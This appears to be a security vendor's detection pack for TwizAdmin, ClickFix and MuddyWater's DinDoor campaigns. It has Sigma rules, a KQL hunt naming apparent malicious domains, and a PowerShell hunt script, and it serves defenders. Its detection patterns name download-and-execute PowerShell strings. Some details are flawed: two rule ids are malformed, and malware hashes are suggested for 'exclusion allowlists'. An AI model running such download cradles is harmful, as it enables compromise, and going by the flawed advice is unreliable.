Back to Intelligence

TwizAdmin & DinDoor Operations: Multi-Platform Clipping, ClickFix, and Deno Runtime Abuse — Enterprise Detection Pack

SA
Security Arsenal Team
April 24, 2026
6 min read

Current OTX pulses indicate a convergence of sophisticated threats targeting endpoints through diverse vectors. The TwizAdmin operation (attributed to actor DataBreachPlus) represents a mature Malware-as-a-Service (MaaS) ecosystem combining cryptocurrency clippers, infostealers (BIP-39 seeds, browser credentials), and ransomware (crpx0) delivered via FedEx-themed lures. Simultaneously, ClickFix campaigns are utilizing social engineering to trick users into executing malicious commands via native system tools, deploying loaders like Vidar and stealers like Lumma/Redline. Finally, the MuddyWater APT group is deploying the DinDoor backdoor, abusing the Deno runtime to execute obfuscated JavaScript for C2 and fingerprinting, signaling a trend toward unconventional runtime exploitation for evasion.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

  • Distribution: Phishing campaigns impersonating FedEx/Shipping services targeting Windows and macOS.
  • Payload Behavior: Multi-stage payload involving a Java RAT and a FastAPI-based C2 panel. Performs clipboard hijacking for 8+ crypto chains and steals BIP-39 seed phrases.
  • C2 Communication: FastAPI panel on port 1337; utilizes license keys for operational management.
  • Persistence: Mechanisms typical of Java RATs and scheduled tasks (implied via "managed via panel").
  • Anti-Analysis: Likely employs standard binary obfuscation and license-key verification to hinder sandbox execution.

ClickFix (Unknown)

  • Distribution: Social engineering campaigns impersonating Intuit QuickBooks, Booking.com, and others.
  • Payload Behavior: Living-off-the-Land (LotL) technique; manipulates victims into running malicious commands in native tools (PowerShell/Terminal) to download payloads like Lumma Stealer, Vidar, Redline, and NetSupport RAT.
  • C2 Communication: Varies based on the specific stealer family deployed.
  • Persistence: Established by the secondary payload (e.g., Scheduled Tasks for stealers).
  • Anti-Analysis: Heavy use of obfuscation in the delivered shell commands.

DinDoor (MuddyWater)

  • Distribution: Malicious MSI files, often delivered via spear-phishing.
  • Payload Behavior: Abuses the Deno JavaScript/TypeScript runtime. Executes obfuscated JavaScript; one variant writes to disk, another runs entirely in-memory.
  • C2 Communication: Uses HTTPS for C2; employs specific fingerprinting algorithms to generate unique victim IDs.
  • Persistence: Established via the MSI installation mechanism and potentially registry run keys for the Deno process.
  • Anti-Analysis: Memory-only execution capabilities and code obfuscation within the Deno runtime.

IOC Analysis

  • Indicator Types: The pulses provide a mix of IPv4 addresses (C2 infrastructure), Domains (C2 and Phishing), URLs (Payload hosting), and File Hashes (SHA256, MD5, SHA1 of malware samples).
  • Operationalization: SOC teams should immediately import the domains and IPs into firewall blocklists and EDLs (External Data Lists). File hashes should be added to EDR exclusion allowlists (for whitelisting) or blocklists (for prevention) depending on policy. The hashes correspond to the TwizAdmin payloads and DinDoor MSI droppers.
  • Decoding Tools: Network logs (Firewall/Proxy) will catch the domain/IP IOCs. EDR solutions (CrowdStrike, SentinelOne, Elastic) are required to detect the file hash IOCs and process behaviors (Deno execution).

Detection Engineering

YAML
title: Potential Deno Runtime Abuse - DinDoor Backdoor
id: 4e8b3c2d-1a5f-4b6e-9c7d-8f9a0b1c2d3e
description: Detects the execution of the Deno runtime, which is abused by the DinDoor backdoor (MuddyWater) to execute malicious JavaScript. Deno is not standard on most enterprise Windows endpoints.
status: experimental
date: 2026/04/24
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\deno.exe'
    # Optional: Check for suspicious run arguments often used in DinDoor
    CommandLine|contains:
      - 'run '
      - 'eval '
  condition: selection
falsepositives:
  - Legitimate developer workstations using Deno (rare in enterprise)
level: high
tags:
  - attack.execution
  - attack.t1059.005
---
title: Suspicious PowerShell Execution via ClickFix Technique
id: 5f9c4d3e-2b6g-5c7f-0d8e-9a1b2c3d4e5f
description: Detects PowerShell processes spawned by browsers (ClickFix pattern) or containing obfuscated commands characteristic of "ClickFix" social engineering attacks.
status: experimental
date: 2026/04/24
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
      - '\brave.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\pwsh.exe'
  selection_obfuscation:
    CommandLine|contains:
      - 'FromBase64String'
      - 'IEX '
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: all of selection_*
falsepositives:
  - Legitimate web-based troubleshooting tools (rare)
level: high
tags:
  - attack.initial_access
  - attack.t1189
---
title: Network Connection to Non-Standard Port 1337 (TwizAdmin C2)
id: 6g0d5e4f-3c7h-6d8g-1e9f-0b2c3d4e5f6a
description: Detects outbound network connections to port 1337, associated with the TwizAdmin malware C2 panel.
status: experimental
date: 2026/04/24
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort: 1337
    Initiated: 'true'
  condition: selection
falsepositives:
  - Legitimate development servers or games using this port
level: medium
tags:
  - attack.command_and_control
  - attack.t1071

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Deno Runtime execution and Suspicious PowerShell (ClickFix/TwizAdmin)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("deno.exe", "java.exe", "javaw.exe", "powershell.exe", "cmd.exe")
| where ProcessCommandLine has_any ("run", "eval", "FromBase64String", "IEX", "DownloadString") 
   or FolderPath endswith "\\deno.exe"
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, FolderPath
| union (DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort == 1337 or RemoteUrl has_any ("fanonlyatn.xyz", "ineracaspsl.site", "serialmenot.com", "ustazazharidrus.com", "account-help.info")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName)

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for TwizAdmin, ClickFix artifacts, and DinDoor backdoors.
.DESCRIPTION
    Checks for running Deno/Java processes, suspicious scheduled tasks, and registry persistence.
#>

Write-Host "[+] Hunting for DinDoor (Deno) and TwizAdmin (Java/Clipper) artifacts..."

# 1. Check for Suspicious Processes
$suspiciousProcs = @("deno", "java", "javaw")
$found = Get-Process | Where-Object { $suspiciousProcs -contains $_.ProcessName } | Select-Object ProcessName, Id, Path

if ($found) {
    Write-Host "[!] WARNING: Found suspicious running processes:" -ForegroundColor Red
    $found | Format-Table -AutoSize
} else {
    Write-Host "[-] No Deno/Java processes detected running." -ForegroundColor Green
}

# 2. Check Registry Run Keys for Suspicious Entries
$runPaths = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)

Write-Host "[+] Scanning Registry Run Keys for suspicious persistence..."
foreach ($path in $runPaths) {
    if (Test-Path $path) {
        Get-ItemProperty $path -ErrorAction SilentlyContinue | 
        Get-Member -MemberType NoteProperty | 
        Where-Object { $_.Name -ne "PSPath" -and $_.Name -ne "PSParentPath" } | 
        ForEach-Object {
            $val = (Get-ItemProperty $path).($_.Name)
            if ($val -match ".js" -or $val -match "deno" -or $val -match "http" -or $val -match ".jar") {
                Write-Host "[!] Suspicious entry in $path : $($_.Name) = $val" -ForegroundColor Yellow
            }
        }
    }
}

# 3. Check for TwizAdmin/DinDoor File Presence (Based on common locations)
$pathsToScan = @("$env:TEMP", "$env:APPDATA")
Write-Host "[+] Scanning user directories for .js/.jar/.msi files created recently..."
$recentFiles = Get-ChildItem -Path $pathsToScan -Include *.js, *.jar, *.msi -Recurse -ErrorAction SilentlyContinue | 
                Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
if ($recentFiles) {
    Write-Host "[!] Found recently created script/jar/msi files:" -ForegroundColor Yellow
    $recentFiles | Select-Object FullName, LastWriteTime | Format-Table -AutoSize
}


# Response Priorities

*   **Immediate:** Block all listed IOCs (Domains and IPs) at the network perimeter. Initiate a hunt for processes named `deno.exe` or suspicious Java instances connecting to port 1337.
*   **24h:** If credential stealing (Lumma, Vidar, Redline) is suspected, enforce password resets for privileged accounts and rotate exposed API keys/seed phrases.
*   **1 Week:** Review and harden application allowlisting policies to prevent the execution of unauthorized runtimes like Deno. Conduct security awareness training focused on identifying "ClickFix" style social engineering (fake browser errors/prompts).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-apttwizadmindindoorclickfixmuddywaterinfostealer

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action